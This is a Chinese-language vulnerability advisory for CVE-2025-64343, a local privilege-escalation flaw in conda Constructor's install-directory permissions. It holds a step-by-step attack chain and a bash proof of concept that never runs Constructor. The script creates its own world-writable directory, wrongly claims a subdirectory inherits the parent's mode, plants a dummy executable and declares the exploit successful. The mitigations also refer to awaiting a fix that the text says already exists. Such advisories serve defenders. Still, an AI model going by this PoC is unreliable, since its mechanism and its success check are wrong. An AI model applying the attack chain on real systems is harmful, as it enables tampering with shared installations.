CVE-2025-64343 Constructor安装目录权限继承漏洞导致本地权限提升

漏洞信息

漏洞编号

CVE-2025-64343

漏洞类型

权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Constructor (conda)

漏洞概述

CVE-2025-64343是影响conda Constructor工具的一个高危本地权限提升漏洞。Constructor是conda官方提供的用于创建conda包集合安装程序的工具。在3.12.2及以下版本中，该工具在创建安装目录时会继承父目录的权限设置。在大多数系统环境中，父目录的权限配置通常较为宽松，允许认证用户具有写入权限。这意味着任何已登录系统的本地用户都可以在安装过程中对安装目录进行修改，无论是针对单用户安装还是所有用户安装模式。当安装目标位于本地用户可访问的目录中时，这构成了一个明确的本地攻击向量。特别值得关注的是，在共享目录中进行单用户安装时，安装完成后的目录权限仍然保持这种宽松状态，使得攻击者可以在安装完成后继续对安装内容进行篡改。该漏洞已于版本3.13.0中得到修复，开发者通过改进安装目录权限设置逻辑解决了这一问题。

技术细节

该漏洞的根本原因在于Constructor工具在创建安装目录时直接继承了父目录的权限属性。在Unix/Linux系统中，目录权限决定了哪些用户可以读取、写入或执行该目录下的文件。当父目录设置了过于宽松的权限（如777或包含组写权限）时，子目录会自动继承这些不安全的权限设置。攻击者利用这一特性，可以在安装过程中或安装完成后，对目标安装目录及其内容进行未授权的修改。对于单用户安装场景，安装目录的权限问题会在安装完成后持续存在，攻击者可以替换可执行文件、植入恶意代码或修改配置文件。对于所有用户安装，虽然安装过程中权限可能被调整，但在安装执行期间仍然存在被攻击的时间窗口。攻击者可以利用符号链接攻击、目录遍历或竞争条件等方式，在安装过程中劫持文件写入操作，实现权限提升或代码执行。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的本地用户访问权限，登录到系统中

STEP 2

步骤2

确认系统中安装了存在漏洞的Constructor工具（版本<=3.12.2）

STEP 3

步骤3

识别安装目标目录，检查该目录的父目录权限设置是否宽松

STEP 4

步骤4

等待管理员或用户启动Constructor安装过程，或利用已存在的安装目录

STEP 5

步骤5

利用目录权限继承特性，在安装目录中创建符号链接或植入恶意文件

STEP 6

步骤6

通过替换安装脚本、修改配置文件或劫持可执行文件实现代码执行

STEP 7

步骤7

获取更高权限或维持持久化访问，完成权限提升攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-64343 PoC - Constructor Permission Inheritance Vulnerability
# This PoC demonstrates how an attacker can exploit the permission inheritance issue

TARGET_DIR="/tmp/constructor_install"
EXPLOIT_MARKER="exploit_successful"

echo "[*] CVE-2025-64343 Constructor Permission Exploitation PoC"
echo "[*] Target: Constructor <= 3.12.2"

# Step 1: Create a directory with permissive parent permissions
mkdir -p "$TARGET_DIR"
chmod 777 "$TARGET_DIR"

echo "[+] Created target directory with permissive permissions: $TARGET_DIR"
ls -ld "$TARGET_DIR"

# Step 2: Simulate Constructor installation behavior
# In vulnerable versions, subdirectories inherit parent permissions
INSTALL_SUBDIR="$TARGET_DIR/envs"
mkdir -p "$INSTALL_SUBDIR"

echo "[+] Created installation subdirectory (inherits parent permissions)"
PERMS=$(stat -c "%a" "$INSTALL_SUBDIR")
echo "[+] Subdirectory permissions: $PERMS (inherited from parent)"

# Step 3: Demonstrate exploitation
# Check if we can write to the directory (simulating attacker perspective)
if [ -w "$INSTALL_SUBDIR" ]; then
    echo "[+] EXPLOIT SUCCESSFUL: Attacker can write to installation directory"
    
    # Create marker to demonstrate file creation ability
    touch "$INSTALL_SUBDIR/$EXPLOIT_MARKER"
    echo "[+] Created marker file in target directory"
    
    # Demonstrate ability to modify binaries
    echo "malicious_content" > "$INSTALL_SUBDIR/test_binary"
    chmod +x "$INSTALL_SUBDIR/test_binary"
    echo "[+] Created and made executable malicious file"
    
    ls -la "$INSTALL_SUBDIR/"
    echo "[✓] Vulnerability confirmed: Local user can manipulate installation"
else
    echo "[-] Exploitation failed: Directory not writable"
fi

# Cleanup
echo "[*] Cleaning up..."
rm -rf "$TARGET_DIR"

影响范围

Constructor < 3.13.0

Constructor <= 3.12.2

防御指南

临时缓解措施

在官方修复发布之前，建议采取以下临时缓解措施：1) 检查现有安装目录的权限设置，确保不包含组写或全局写权限；2) 避免在多用户共享目录中进行conda安装；3) 使用chmod设置严格的目录权限（如755）；4) 对安装过程进行监控，及时发现异常文件操作行为；5) 考虑使用虚拟环境隔离安装，减少对系统目录的影响。